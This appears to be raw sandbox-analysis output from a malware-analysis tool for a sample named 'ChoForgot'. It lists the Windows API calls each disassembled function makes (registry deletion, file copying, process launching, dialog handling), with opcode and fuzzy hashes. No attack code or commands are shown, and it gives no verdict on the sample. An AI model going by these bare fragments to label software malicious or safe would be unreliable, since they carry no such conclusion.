                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(006DB088), ref: 00402387
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                        • String ID: !
                                                                                                                                                                                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                        • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                        • String ID: Version
                                                                                                                                                                                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                        • String ID: !N~
                                                                                                                                                                                                                                                                                                        • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                        • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                        • API String ID: 3509786178-2769509956
